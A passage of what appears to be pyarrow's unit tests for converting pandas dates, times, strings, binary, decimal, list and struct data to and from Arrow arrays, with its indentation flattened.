table_pandas_objects = table.to_pandas()
ex_objects = ex_values.astype('object')
expected_pandas_objects = pd.DataFrame({'date32': ex_objects,
'date64': ex_objects},
columns=colnames)
tm.assert_frame_equal(table_pandas_objects,
expected_pandas_objects)
def test_dates_from_integers(self):
t1 = pa.date32()
t2 = pa.date64()
arr = np.array([17259, 17260, 17261], dtype='int32')
arr2 = arr.astype('int64') * 86400000
a1 = pa.array(arr, type=t1)
a2 = pa.array(arr2, type=t2)
expected = date(2017, 4, 3)
assert a1[0].as_py() == expected
assert a2[0].as_py() == expected
def test_pytime_from_pandas(self):
pytimes = [time(1, 2, 3, 1356),
time(4, 5, 6, 1356)]
# microseconds
t1 = pa.time64('us')
aobjs = np.array(pytimes + [None], dtype=object)
parr = pa.array(aobjs)
assert parr.type == t1
assert parr[0].as_py() == pytimes[0]
assert parr[1].as_py() == pytimes[1]
assert parr[2] is pa.NA
# DataFrame
df = pd.DataFrame({'times': aobjs})
batch = pa.RecordBatch.from_pandas(df)
assert batch[0].equals(parr)
# Test ndarray of int64 values
arr = np.array([_pytime_to_micros(v) for v in pytimes],
dtype='int64')
a1 = pa.array(arr, type=pa.time64('us'))
assert a1[0].as_py() == pytimes[0]
a2 = pa.array(arr * 1000, type=pa.time64('ns'))
assert a2[0].as_py() == pytimes[0]
a3 = pa.array((arr / 1000).astype('i4'),
type=pa.time32('ms'))
assert a3[0].as_py() == pytimes[0].replace(microsecond=1000)
a4 = pa.array((arr / 1000000).astype('i4'),
type=pa.time32('s'))
assert a4[0].as_py() == pytimes[0].replace(microsecond=0)
def test_arrow_time_to_pandas(self):
pytimes = [time(1, 2, 3, 1356),
time(4, 5, 6, 1356),
time(0, 0, 0)]
expected = np.array(pytimes[:2] + [None])
expected_ms = np.array([x.replace(microsecond=1000)
for x in pytimes[:2]] +
[None])
expected_s = np.array([x.replace(microsecond=0)
for x in pytimes[:2]] +
[None])
arr = np.array([_pytime_to_micros(v) for v in pytimes],
dtype='int64')
arr = np.array([_pytime_to_micros(v) for v in pytimes],
dtype='int64')
null_mask = np.array([False, False, True], dtype=bool)
a1 = pa.array(arr, mask=null_mask, type=pa.time64('us'))
a2 = pa.array(arr * 1000, mask=null_mask,
type=pa.time64('ns'))
a3 = pa.array((arr / 1000).astype('i4'), mask=null_mask,
type=pa.time32('ms'))
a4 = pa.array((arr / 1000000).astype('i4'), mask=null_mask,
type=pa.time32('s'))
names = ['time64[us]', 'time64[ns]', 'time32[ms]', 'time32[s]']
batch = pa.RecordBatch.from_arrays([a1, a2, a3, a4], names)
for arr, expected_values in [(a1, expected),
(a2, expected),
(a3, expected_ms),
(a4, expected_s)]:
result_pandas = arr.to_pandas()
assert (result_pandas.values == expected_values).all()
df = batch.to_pandas()
expected_df = pd.DataFrame({'time64[us]': expected,
'time64[ns]': expected,
'time32[ms]': expected_ms,
'time32[s]': expected_s},
columns=names)
tm.assert_frame_equal(df, expected_df)
def test_numpy_datetime64_columns(self):
datetime64_ns = np.array([
'2007-07-13T01:23:34.123456789',
None,
'2006-01-13T12:34:56.432539784',
'2010-08-13T05:46:57.437699912'],
dtype='datetime64[ns]')
_check_array_from_pandas_roundtrip(datetime64_ns)
datetime64_us = np.array([
'2007-07-13T01:23:34.123456',
None,
'2006-01-13T12:34:56.432539',
'2010-08-13T05:46:57.437699'],
dtype='datetime64[us]')
_check_array_from_pandas_roundtrip(datetime64_us)
datetime64_ms = np.array([
'2007-07-13T01:23:34.123',
None,
'2006-01-13T12:34:56.432',
'2010-08-13T05:46:57.437'],
dtype='datetime64[ms]')
_check_array_from_pandas_roundtrip(datetime64_ms)
datetime64_s = np.array([
'2007-07-13T01:23:34',
None,
'2006-01-13T12:34:56',
'2010-08-13T05:46:57'],
dtype='datetime64[s]')
_check_array_from_pandas_roundtrip(datetime64_s)
@pytest.mark.parametrize('dtype', [pa.date32(), pa.date64()])
def test_numpy_datetime64_day_unit(self, dtype):
datetime64_d = np.array([
'2007-07-13',
None,
'2006-01-15',
'2010-08-19'],
dtype='datetime64[D]')
_check_array_from_pandas_roundtrip(datetime64_d, type=dtype)
def test_array_from_pandas_date_with_mask(self):
m = np.array([True, False, True])
data = pd.Series([
date(1990, 1, 1),
date(1991, 1, 1),
date(1992, 1, 1)
])
result = pa.Array.from_pandas(data, mask=m)
expected = pd.Series([None, date(1991, 1, 1), None])
assert pa.Array.from_pandas(expected).equals(result)
def test_fixed_offset_timezone(self):
df = pd.DataFrame({
'a': [
pd.Timestamp('2012-11-11 00:00:00+01:00'),
pd.NaT
]
})
_check_pandas_roundtrip(df)
_check_serialize_components_roundtrip(df)
def test_timedeltas_no_nulls(self):
df = pd.DataFrame({
'timedelta64': np.array([0, 3600000000000, 7200000000000],
dtype='timedelta64[ns]')
})
field = pa.field('timedelta64', pa.duration('ns'))
schema = pa.schema([field])
_check_pandas_roundtrip(
df,
expected_schema=schema,
)
def test_timedeltas_nulls(self):
df = pd.DataFrame({
'timedelta64': np.array([0, None, 7200000000000],
dtype='timedelta64[ns]')
})
field = pa.field('timedelta64', pa.duration('ns'))
schema = pa.schema([field])
_check_pandas_roundtrip(
df,
expected_schema=schema,
)
# ----------------------------------------------------------------------
# Conversion tests for string and binary types.
class TestConvertStringLikeTypes(object):
def test_pandas_unicode(self):
repeats = 1000
values = [u'foo', None, u'bar', u'mañana', np.nan]
df = pd.DataFrame({'strings': values * repeats})
field = pa.field('strings', pa.string())
schema = pa.schema([field])
_check_pandas_roundtrip(df, expected_schema=schema)
def test_bytes_to_binary(self):
values = [u'qux', b'foo', None, bytearray(b'barz'), 'qux', np.nan]
df = pd.DataFrame({'strings': values})
table = pa.Table.from_pandas(df)
assert table[0].type == pa.binary()
values2 = [b'qux', b'foo', None, b'barz', b'qux', np.nan]
expected = pd.DataFrame({'strings': values2})
_check_pandas_roundtrip(df, expected)
@pytest.mark.large_memory
def test_bytes_exceed_2gb(self):
v1 = b'x' * 100000000
v2 = b'x' * 147483646
# ARROW-2227, hit exactly 2GB on the nose
df = pd.DataFrame({
'strings': [v1] * 20 + [v2] + ['x'] * 20
})
arr = pa.array(df['strings'])
assert isinstance(arr, pa.ChunkedArray)
assert arr.num_chunks == 2
arr = None
table = pa.Table.from_pandas(df)
assert table[0].num_chunks == 2
def test_fixed_size_bytes(self):
values = [b'foo', None, bytearray(b'bar'), None, None, b'hey']
df = pd.DataFrame({'strings': values})
schema = pa.schema([pa.field('strings', pa.binary(3))])
table = pa.Table.from_pandas(df, schema=schema)
assert table.schema[0].type == schema[0].type
assert table.schema[0].name == schema[0].name
result = table.to_pandas()
tm.assert_frame_equal(result, df)
def test_fixed_size_bytes_does_not_accept_varying_lengths(self):
values = [b'foo', None, b'ba', None, None, b'hey']
df = pd.DataFrame({'strings': values})
schema = pa.schema([pa.field('strings', pa.binary(3))])
with pytest.raises(pa.ArrowInvalid):
pa.Table.from_pandas(df, schema=schema)
def test_variable_size_bytes(self):
s = pd.Series([b'123', b'', b'a', None])
_check_series_roundtrip(s, type_=pa.binary())
def test_binary_from_bytearray(self):
s = pd.Series([bytearray(b'123'), bytearray(b''), bytearray(b'a'),
None])
# Explicitly set type
_check_series_roundtrip(s, type_=pa.binary())
# Infer type from bytearrays
_check_series_roundtrip(s, expected_pa_type=pa.binary())
def test_large_binary(self):
s = pd.Series([b'123', b'', b'a', None])
_check_series_roundtrip(s, type_=pa.large_binary())
df = pd.DataFrame({'a': s})
_check_pandas_roundtrip(
df, schema=pa.schema([('a', pa.large_binary())]))
def test_large_string(self):
s = pd.Series(['123', '', 'a', None])
_check_series_roundtrip(s, type_=pa.large_string())
df = pd.DataFrame({'a': s})
_check_pandas_roundtrip(
df, schema=pa.schema([('a', pa.large_string())]))
def test_table_empty_str(self):
values = ['', '', '', '', '']
df = pd.DataFrame({'strings': values})
field = pa.field('strings', pa.string())
schema = pa.schema([field])
table = pa.Table.from_pandas(df, schema=schema)
result1 = table.to_pandas(strings_to_categorical=False)
expected1 = pd.DataFrame({'strings': values})
tm.assert_frame_equal(result1, expected1, check_dtype=True)
result2 = table.to_pandas(strings_to_categorical=True)
expected2 = pd.DataFrame({'strings': pd.Categorical(values)})
tm.assert_frame_equal(result2, expected2, check_dtype=True)
def test_selective_categoricals(self):
values = ['', '', '', '', '']
df = pd.DataFrame({'strings': values})
field = pa.field('strings', pa.string())
schema = pa.schema([field])
table = pa.Table.from_pandas(df, schema=schema)
expected_str = pd.DataFrame({'strings': values})
expected_cat = pd.DataFrame({'strings': pd.Categorical(values)})
result1 = table.to_pandas(categories=['strings'])
tm.assert_frame_equal(result1, expected_cat, check_dtype=True)
result2 = table.to_pandas(categories=[])
tm.assert_frame_equal(result2, expected_str, check_dtype=True)
result3 = table.to_pandas(categories=('strings',))
tm.assert_frame_equal(result3, expected_cat, check_dtype=True)
result4 = table.to_pandas(categories=tuple())
tm.assert_frame_equal(result4, expected_str, check_dtype=True)
def test_to_pandas_categorical_zero_length(self):
# ARROW-3586
array = pa.array([], type=pa.int32())
table = pa.Table.from_arrays(arrays=[array], names=['col'])
# This would segfault under 0.11.0
table.to_pandas(categories=['col'])
def test_to_pandas_categories_already_dictionary(self):
# Showed up in ARROW-6434, ARROW-6435
array = pa.array(['foo', 'foo', 'foo', 'bar']).dictionary_encode()
table = pa.Table.from_arrays(arrays=[array], names=['col'])
result = table.to_pandas(categories=['col'])
assert table.to_pandas().equals(result)
def test_table_str_to_categorical_without_na(self):
values = ['a', 'a', 'b', 'b', 'c']
df = pd.DataFrame({'strings': values})
field = pa.field('strings', pa.string())
schema = pa.schema([field])
table = pa.Table.from_pandas(df, schema=schema)
result = table.to_pandas(strings_to_categorical=True)
expected = pd.DataFrame({'strings': pd.Categorical(values)})
tm.assert_frame_equal(result, expected, check_dtype=True)
with pytest.raises(pa.ArrowInvalid):
table.to_pandas(strings_to_categorical=True,
zero_copy_only=True)
def test_table_str_to_categorical_with_na(self):
values = [None, 'a', 'b', np.nan]
df = pd.DataFrame({'strings': values})
field = pa.field('strings', pa.string())
schema = pa.schema([field])
table = pa.Table.from_pandas(df, schema=schema)
result = table.to_pandas(strings_to_categorical=True)
expected = pd.DataFrame({'strings': pd.Categorical(values)})
tm.assert_frame_equal(result, expected, check_dtype=True)
with pytest.raises(pa.ArrowInvalid):
table.to_pandas(strings_to_categorical=True,
zero_copy_only=True)
# Regression test for ARROW-2101
def test_array_of_bytes_to_strings(self):
converted = pa.array(np.array([b'x'], dtype=object), pa.string())
assert converted.type == pa.string()
# Make sure that if an ndarray of bytes is passed to the array
# constructor and the type is string, it will fail if those bytes
# cannot be converted to utf-8
def test_array_of_bytes_to_strings_bad_data(self):
with pytest.raises(
pa.lib.ArrowInvalid,
match="was not a utf8 string"):
pa.array(np.array([b'\x80\x81'], dtype=object), pa.string())
def test_numpy_string_array_to_fixed_size_binary(self):
arr = np.array([b'foo', b'bar', b'baz'], dtype='|S3')
converted = pa.array(arr, type=pa.binary(3))
expected = pa.array(list(arr), type=pa.binary(3))
assert converted.equals(expected)
mask = np.array([True, False, True])
converted = pa.array(arr, type=pa.binary(3), mask=mask)
expected = pa.array([b'foo', None, b'baz'], type=pa.binary(3))
assert converted.equals(expected)
with pytest.raises(pa.lib.ArrowInvalid,
match=r'Got bytestring of length 3 \(expected 4\)'):
arr = np.array([b'foo', b'bar', b'baz'], dtype='|S3')
pa.array(arr, type=pa.binary(4))
with pytest.raises(
pa.lib.ArrowInvalid,
match=r'Got bytestring of length 12 \(expected 3\)'):
arr = np.array([b'foo', b'bar', b'baz'], dtype='|U3')
pa.array(arr, type=pa.binary(3))
class TestConvertDecimalTypes(object):
"""
Conversion test for decimal types.
"""
decimal32 = [
decimal.Decimal('-1234.123'),
decimal.Decimal('1234.439')
]
decimal64 = [
decimal.Decimal('-129934.123331'),
decimal.Decimal('129534.123731')
]
decimal128 = [
decimal.Decimal('394092382910493.12341234678'),
decimal.Decimal('-314292388910493.12343437128')
]
@pytest.mark.parametrize(('values', 'expected_type'), [
pytest.param(decimal32, pa.decimal128(7, 3), id='decimal32'),
pytest.param(decimal64, pa.decimal128(12, 6), id='decimal64'),
pytest.param(decimal128, pa.decimal128(26, 11), id='decimal128')
])
def test_decimal_from_pandas(self, values, expected_type):
expected = pd.DataFrame({'decimals': values})
table = pa.Table.from_pandas(expected, preserve_index=False)
field = pa.field('decimals', expected_type)
# schema's metadata is generated by from_pandas conversion
expected_schema = pa.schema([field], metadata=table.schema.metadata)
assert table.schema.equals(expected_schema)
@pytest.mark.parametrize('values', [
pytest.param(decimal32, id='decimal32'),
pytest.param(decimal64, id='decimal64'),
pytest.param(decimal128, id='decimal128')
])
def test_decimal_to_pandas(self, values):
expected = pd.DataFrame({'decimals': values})
converted = pa.Table.from_pandas(expected)
df = converted.to_pandas()
tm.assert_frame_equal(df, expected)
def test_decimal_fails_with_truncation(self):
data1 = [decimal.Decimal('1.234')]
type1 = pa.decimal128(10, 2)
with pytest.raises(pa.ArrowInvalid):
pa.array(data1, type=type1)
data2 = [decimal.Decimal('1.2345')]
type2 = pa.decimal128(10, 3)
with pytest.raises(pa.ArrowInvalid):
pa.array(data2, type=type2)
def test_decimal_with_different_precisions(self):
data = [
decimal.Decimal('0.01'),
decimal.Decimal('0.001'),
]
series = pd.Series(data)
array = pa.array(series)
assert array.to_pylist() == data
assert array.type == pa.decimal128(3, 3)
array = pa.array(data, type=pa.decimal128(12, 5))
expected = [decimal.Decimal('0.01000'), decimal.Decimal('0.00100')]
assert array.to_pylist() == expected
def test_decimal_with_None_explicit_type(self):
series = pd.Series([decimal.Decimal('3.14'), None])
_check_series_roundtrip(series, type_=pa.decimal128(12, 5))
# Test that having all None values still produces decimal array
series = pd.Series([None] * 2)
_check_series_roundtrip(series, type_=pa.decimal128(12, 5))
def test_decimal_with_None_infer_type(self):
series = pd.Series([decimal.Decimal('3.14'), None])
_check_series_roundtrip(series, expected_pa_type=pa.decimal128(3, 2))
def test_strided_objects(self, tmpdir):
# see ARROW-3053
data = {
'a': {0: 'a'},
'b': {0: decimal.Decimal('0.0')}
}
# This yields strided objects
df = pd.DataFrame.from_dict(data)
_check_pandas_roundtrip(df)
class TestConvertListTypes(object):
"""
Conversion tests for list<> types.
"""
def test_column_of_arrays(self):
df, schema = dataframe_with_arrays()
_check_pandas_roundtrip(df, schema=schema, expected_schema=schema)
table = pa.Table.from_pandas(df, schema=schema, preserve_index=False)
# schema's metadata is generated by from_pandas conversion
expected_schema = schema.with_metadata(table.schema.metadata)
assert table.schema.equals(expected_schema)
for column in df.columns:
field = schema.field(column)
_check_array_roundtrip(df[column], type=field.type)
def test_column_of_arrays_to_py(self):
# Test regression in ARROW-1199 not caught in above test
dtype = 'i1'
arr = np.array([
np.arange(10, dtype=dtype),
np.arange(5, dtype=dtype),
None,
np.arange(1, dtype=dtype)
])
type_ = pa.list_(pa.int8())
parr = pa.array(arr, type=type_)
assert parr[0].as_py() == list(range(10))
assert parr[1].as_py() == list(range(5))
assert parr[2].as_py() is None
assert parr[3].as_py() == [0]
def test_column_of_boolean_list(self):
# ARROW-4370: Table to pandas conversion fails for list of bool
array = pa.array([[True, False], [True]], type=pa.list_(pa.bool_()))
table = pa.Table.from_arrays([array], names=['col1'])
df = table.to_pandas()
expected_df = pd.DataFrame({'col1': [[True, False], [True]]})
tm.assert_frame_equal(df, expected_df)
s = table[0].to_pandas()
tm.assert_series_equal(pd.Series(s), df['col1'], check_names=False)
def test_column_of_decimal_list(self):
array = pa.array([[decimal.Decimal('1'), decimal.Decimal('2')],
[decimal.Decimal('3.3')]],
type=pa.list_(pa.decimal128(2, 1)))
table = pa.Table.from_arrays([array], names=['col1'])
df = table.to_pandas()
expected_df = pd.DataFrame(
{'col1': [[decimal.Decimal('1'), decimal.Decimal('2')],
[decimal.Decimal('3.3')]]})
tm.assert_frame_equal(df, expected_df)
def test_nested_types_from_ndarray_null_entries(self):
# Root cause of ARROW-6435
s = pd.Series(np.array([np.nan, np.nan], dtype=object))
for ty in [pa.list_(pa.int64()),
pa.large_list(pa.int64()),
pa.struct([pa.field('f0', 'int32')])]:
result = pa.array(s, type=ty)
expected = pa.array([None, None], type=ty)
assert result.equals(expected)
with pytest.raises(TypeError):
pa.array(s.values, type=ty)
def test_column_of_lists(self):
df, schema = dataframe_with_lists()
_check_pandas_roundtrip(df, schema=schema, expected_schema=schema)
table = pa.Table.from_pandas(df, schema=schema, preserve_index=False)
# schema's metadata is generated by from_pandas conversion
expected_schema = schema.with_metadata(table.schema.metadata)
assert table.schema.equals(expected_schema)
for column in df.columns:
field = schema.field(column)
_check_array_roundtrip(df[column], type=field.type)
def test_column_of_lists_first_empty(self):
# ARROW-2124
num_lists = [[], [2, 3, 4], [3, 6, 7, 8], [], [2]]
series = pd.Series([np.array(s, dtype=float) for s in num_lists])
arr = pa.array(series)
result = pd.Series(arr.to_pandas())
tm.assert_series_equal(result, series)
def test_column_of_lists_chunked(self):
# ARROW-1357
df = pd.DataFrame({
'lists': np.array([
[1, 2],
None,
[2, 3],
[4, 5],
[6, 7],
[8, 9]
], dtype=object)
})
schema = pa.schema([
pa.field('lists', pa.list_(pa.int64()))
])
t1 = pa.Table.from_pandas(df[:2], schema=schema)
t2 = pa.Table.from_pandas(df[2:], schema=schema)
table = pa.concat_tables([t1, t2])
result = table.to_pandas()
tm.assert_frame_equal(result, df)
def test_empty_column_of_lists_chunked(self):
df = pd.DataFrame({
'lists': np.array([], dtype=object)
})
schema = pa.schema([
pa.field('lists', pa.list_(pa.int64()))
])
table = pa.Table.from_pandas(df, schema=schema)
result = table.to_pandas()
tm.assert_frame_equal(result, df)
def test_column_of_lists_chunked2(self):
data1 = [[0, 1], [2, 3], [4, 5], [6, 7], [10, 11],
[12, 13], [14, 15], [16, 17]]
data2 = [[8, 9], [18, 19]]
a1 = pa.array(data1)
a2 = pa.array(data2)
t1 = pa.Table.from_arrays([a1], names=['a'])
t2 = pa.Table.from_arrays([a2], names=['a'])
concatenated = pa.concat_tables([t1, t2])
result = concatenated.to_pandas()
expected = pd.DataFrame({'a': data1 + data2})
tm.assert_frame_equal(result, expected)
def test_column_of_lists_strided(self):
df, schema = dataframe_with_lists()
df = pd.concat([df] * 6, ignore_index=True)
arr = df['int64'].values[::3]
assert arr.strides[0] != 8
_check_array_roundtrip(arr)
def test_nested_lists_all_none(self):
data = np.array([[None, None], None], dtype=object)
arr = pa.array(data)
expected = pa.array(list(data))
assert arr.equals(expected)
assert arr.type == pa.list_(pa.null())
data2 = np.array([None, None, [None, None],
np.array([None, None], dtype=object)],
dtype=object)
arr = pa.array(data2)
expected = pa.array([None, None, [None, None], [None, None]])
assert arr.equals(expected)
def test_nested_lists_all_empty(self):
# ARROW-2128
data = pd.Series([[], [], []])
arr = pa.array(data)
expected = pa.array(list(data))
assert arr.equals(expected)
assert arr.type == pa.list_(pa.null())
def test_nested_list_first_empty(self):
# ARROW-2711
data = pd.Series([[], [u"a"]])
arr = pa.array(data)
expected = pa.array(list(data))
assert arr.equals(expected)
assert arr.type == pa.list_(pa.string())
def test_nested_smaller_ints(self):
# ARROW-1345, ARROW-2008, there were some type inference bugs happening
# before
data = pd.Series([np.array([1, 2, 3], dtype='i1'), None])
result = pa.array(data)
result2 = pa.array(data.values)
expected = pa.array([[1, 2, 3], None], type=pa.list_(pa.int8()))
assert result.equals(expected)
assert result2.equals(expected)
data3 = pd.Series([np.array([1, 2, 3], dtype='f4'), None])
result3 = pa.array(data3)
expected3 = pa.array([[1, 2, 3], None], type=pa.list_(pa.float32()))
assert result3.equals(expected3)
def test_infer_lists(self):
data = OrderedDict([
('nan_ints', [[None, 1], [2, 3]]),
('ints', [[0, 1], [2, 3]]),
('strs', [[None, u'b'], [u'c', u'd']]),
('nested_strs', [[[None, u'b'], [u'c', u'd']], None])
])
df = pd.DataFrame(data)
expected_schema = pa.schema([
pa.field('nan_ints', pa.list_(pa.int64())),
pa.field('ints', pa.list_(pa.int64())),
pa.field('strs', pa.list_(pa.string())),
pa.field('nested_strs', pa.list_(pa.list_(pa.string())))
])
_check_pandas_roundtrip(df, expected_schema=expected_schema)
def test_infer_numpy_array(self):
data = OrderedDict([
('ints', [
np.array([0, 1], dtype=np.int64),
np.array([2, 3], dtype=np.int64)
])
])
df = pd.DataFrame(data)
expected_schema = pa.schema([
pa.field('ints', pa.list_(pa.int64()))
])
_check_pandas_roundtrip(df, expected_schema=expected_schema)
@pytest.mark.parametrize('t,data,expected', [
(
pa.int64,
[[1, 2], [3], None],
[None, [3], None]
),
(
pa.string,
[[u'aaa', u'bb'], [u'c'], None],
[None, [u'c'], None]
),
(
pa.null,
[[None, None], [None], None],
[None, [None], None]
)
])
def test_array_from_pandas_typed_array_with_mask(self, t, data, expected):
m = np.array([True, False, True])
s = pd.Series(data)
result = pa.Array.from_pandas(s, mask=m, type=pa.list_(t()))
assert pa.Array.from_pandas(expected,
type=pa.list_(t())).equals(result)
def test_empty_list_roundtrip(self):
empty_list_array = np.empty((3,), dtype=object)
empty_list_array.fill([])
df = pd.DataFrame({'a': np.array(['1', '2', '3']),
'b': empty_list_array})
tbl = pa.Table.from_pandas(df)
result = tbl.to_pandas()
tm.assert_frame_equal(result, df)
def test_array_from_nested_arrays(self):
df, schema = dataframe_with_arrays()
for field in schema:
arr = df[field.name].values
expected = pa.array(list(arr), type=field.type)
result = pa.array(arr)
assert result.type == field.type # == list<scalar>
assert result.equals(expected)
class TestConvertStructTypes(object):
"""
Conversion tests for struct types.
"""
def test_pandas_roundtrip(self):
df = pd.DataFrame({'dicts': [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]})
expected_schema = pa.schema([
('dicts', pa.struct([('a', pa.int64()), ('b', pa.int64())])),
])
_check_pandas_roundtrip(df, expected_schema=expected_schema)
# specifying schema explicitly in from_pandas
_check_pandas_roundtrip(
df, schema=expected_schema, expected_schema=expected_schema)
def test_to_pandas(self):
ints = pa.array([None, 2, 3], type=pa.int64())
strs = pa.array([u'a', None, u'c'], type=pa.string())
bools = pa.array([True, False, None], type=pa.bool_())
arr = pa.StructArray.from_arrays(
[ints, strs, bools],
['ints', 'strs', 'bools'])
expected = pd.Series([
{'ints': None, 'strs': u'a', 'bools': True},
{'ints': 2, 'strs': None, 'bools': False},
{'ints': 3, 'strs': u'c', 'bools': None},
])
series = pd.Series(arr.to_pandas())
tm.assert_series_equal(series, expected)
def test_from_numpy(self):
dt = np.dtype([('x', np.int32),
(('y_title', 'y'), np.bool_)])
ty = pa.struct([pa.field('x', pa.int32()),
pa.field('y', pa.bool_())])
data = np.array([], dtype=dt)
arr = pa.array(data, type=ty)
assert arr.to_pylist() == []
data = np.array([(42, True), (43, False)], dtype=dt)
arr = pa.array(data, type=ty)
assert arr.to_pylist() == [{'x': 42, 'y': True},
{'x': 43, 'y': False}]
# With mask
arr = pa.array(data, mask=np.bool_([False, True]), type=ty)
assert arr.to_pylist() == [{'x': 42, 'y': True}, None]
# Trivial struct type
dt = np.dtype([])
ty = pa.struct([])
data = np.array([], dtype=dt)
arr = pa.array(data, type=ty)
assert arr.to_pylist() == []
data = np.array([(), ()], dtype=dt)
arr = pa.array(data, type=ty)
assert arr.to_pylist() == [{}, {}]
def test_from_numpy_nested(self):
# Note: an object field inside a struct
dt = np.dtype([('x', np.dtype([('xx', np.int8),
('yy', np.bool_)])),
('y', np.int16),
('z', np.object_)])
# Note: itemsize is not a multiple of sizeof(object)
assert dt.itemsize == 12
ty = pa.struct([pa.field('x', pa.struct([pa.field('xx', pa.int8()),
pa.field('yy', pa.bool_())])),
pa.field('y', pa.int16()),
pa.field('z', pa.string())])
data = np.array([], dtype=dt)
arr = pa.array(data, type=ty)
assert arr.to_pylist() == []
data = np.array([
((1, True), 2, 'foo'),
((3, False), 4, 'bar')], dtype=dt)
arr = pa.array(data, type=ty)
assert arr.to_pylist() == [
{'x': {'xx': 1, 'yy': True}, 'y': 2, 'z': 'foo'},
{'x': {'xx': 3, 'yy': False}, 'y': 4, 'z': 'bar'}]
@pytest.mark.large_memory
def test_from_numpy_large(self):
# Exercise rechunking + nulls
target_size = 3 * 1024**3 # 4GB
dt = np.dtype([('x', np.float64), ('y', 'object')])
bs = 65536 - dt.itemsize
block = b'.' * bs
n = target_size // (bs + dt.itemsize)
data = np.zeros(n, dtype=dt)
data['x'] = np.random.random_sample(n)
data['y'] = block
# Add implicit nulls
data['x'][data['x'] < 0.2] = np.nan
ty = pa.struct([pa.field('x', pa.float64()),
pa.field('y', pa.binary())])
arr = pa.array(data, type=ty, from_pandas=True)
assert arr.num_chunks == 2
def iter_chunked_array(arr):
for chunk in arr.iterchunks():
for item in chunk:
yield item
def check(arr, data, mask=None):
assert len(arr) == len(data)
xs = data['x']
ys = data['y']
for i, obj in enumerate(iter_chunked_array(arr)):
try:
d = obj.as_py()
if mask is not None and mask[i]:
assert d is None
else:
x = xs[i]
if np.isnan(x):
assert d['x'] is None
else:
assert d['x'] == x
assert d['y'] == ys[i]
except Exception:
print("Failed at index", i)
raise
check(arr, data)
del arr
# Now with explicit mask
mask = np.random.random_sample(n) < 0.2
arr = pa.array(data, type=ty, mask=mask, from_pandas=True)
assert arr.num_chunks == 2
check(arr, data, mask)
del arr
def test_from_numpy_bad_input(self):
ty = pa.struct([pa.field('x', pa.int32()),
pa.field('y', pa.bool_())])
dt = np.dtype([('x', np.int32),
('z', np.bool_)])
data = np.array([], dtype=dt)
with pytest.raises(TypeError,
match="Missing field 'y'"):
pa.array(data, type=ty)
data = np.int32([])
with pytest.raises(TypeError,
match="Expected struct array"):
pa.array(data, type=ty)
def test_from_tuples(self):
df = pd.DataFrame({'tuples': [(1, 2), (3, 4)]})
expected_df = pd.DataFrame(
{'tuples': [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]})
# conversion from tuples works when specifying expected struct type
struct_type = pa.struct([('a', pa.int64()), ('b', pa.int64())])
arr = np.asarray(df['tuples'])
_check_array_roundtrip(
arr, expected=expected_df['tuples'], type=struct_type)
expected_schema = pa.schema([('tuples', struct_type)])
_check_pandas_roundtrip(
df, expected=expected_df, schema=expected_schema,
expected_schema=expected_schema)
class TestZeroCopyConversion(object):
"""
Tests that zero-copy conversion works with some types.
"""
def test_zero_copy_success(self):
result = pa.array([0, 1, 2]).to_pandas(zero_copy_only=True)
npt.assert_array_equal(result, [0, 1, 2])
def test_zero_copy_dictionaries(self):
arr = pa.DictionaryArray.from_arrays(
np.array([0, 0]),
np.array([5]))
result = arr.to_pandas(zero_copy_only=True)
values = pd.Categorical([5, 5])
tm.assert_series_equal(pd.Series(result), pd.Series(values),
check_names=False)
def check_zero_copy_failure(self, arr):
with pytest.raises(pa.ArrowInvalid):
arr.to_pandas(zero_copy_only=True)
def test_zero_copy_failure_on_object_types(self):
self.check_zero_copy_failure(pa.array(['A', 'B', 'C']))
def test_zero_copy_failure_with_int_when_nulls(self):
self.check_zero_copy_failure(pa.array([0, 1, None]))
def test_zero_copy_failure_with_float_when_nulls(self):
self.check_zero_copy_failure(pa.array([0.0, 1.0, None]))
def test_zero_copy_failure_on_bool_types(self):
self.check_zero_copy_failure(pa.array([True, False]))
def test_zero_copy_failure_on_list_types(self):
arr = pa.array([[1, 2], [8, 9]], type=pa.list_(pa.int64()))
self.check_zero_copy_failure(arr)
def test_zero_copy_failure_on_timestamp_types(self):
arr = np.array(['2007-07-13'], dtype='datetime64[ns]')
self.check_zero_copy_failure(pa.array(arr))
def test_zero_copy_failure_on_duration_types(self):
arr = np.array([1], dtype='timedelta64[ns]')
self.check_zero_copy_failure(pa.array(arr))
# This function must be at the top-level for Python 2.7's multiprocessing
def _non_threaded_conversion():
df = _alltypes_example()
_check_pandas_roundtrip(df, use_threads=False)
_check_pandas_roundtrip(df, use_threads=False, as_batch=True)
def _threaded_conversion():
df = _alltypes_example()
_check_pandas_roundtrip(df, use_threads=True)
_check_pandas_roundtrip(df, use_threads=True, as_batch=True)
class TestConvertMisc(object):
"""
Miscellaneous conversion tests.
"""
type_pairs = [
(np.int8, pa.int8()),
(np.int16, pa.int16()),
(np.int32, pa.int32()),
(np.int64, pa.int64()),
(np.uint8, pa.uint8()),
(np.uint16, pa.uint16()),
(np.uint32, pa.uint32()),
(np.uint64, pa.uint64()),
(np.float16, pa.float16()),
(np.float32, pa.float32()),
(np.float64, pa.float64()),
# XXX unsupported
# (np.dtype([('a', 'i2')]), pa.struct([pa.field('a', pa.int16())])),
(np.object, pa.string()),
(np.object, pa.binary()),
(np.object, pa.binary(10)),
(np.object, pa.list_(pa.int64())),
]
def test_all_none_objects(self):
df = pd.DataFrame({'a': [None, None, None]})
_check_pandas_roundtrip(df)
def test_all_none_category(self):
df = pd.DataFrame({'a': [None, None, None]})
df['a'] = df['a'].astype('category')
_check_pandas_roundtrip(df)
def test_empty_arrays(self):
for dtype, pa_type in self.type_pairs:
arr = np.array([], dtype=dtype)
_check_array_roundtrip(arr, type=pa_type)
def test_non_threaded_conversion(self):
_non_threaded_conversion()
def test_threaded_conversion_multiprocess(self):
# Parallel conversion should work from child processes too (ARROW-2963)
pool = mp.Pool(2)
try:
pool.apply(_threaded_conversion)
finally:
pool.close()
pool.join()
def test_category(self):
repeats = 5
v1 = ['foo', None, 'bar', 'qux', np.nan]
v2 = [4, 5, 6, 7, 8]
v3 = [b'foo', None, b'bar', b'qux', np.nan]
arrays = {
'cat_strings': pd.Categorical(v1 * repeats),
'cat_strings_with_na': pd.Categorical(v1 * repeats,
categories=['foo', 'bar']),
'cat_ints': pd.Categorical(v2 * repeats),
'cat_binary': pd.Categorical(v3 * repeats),
'cat_strings_ordered': pd.Categorical(
v1 * repeats, categories=['bar', 'qux', 'foo'],
ordered=True),
'ints': v2 * repeats,
'ints2': v2 * repeats,
'strings': v1 * repeats,
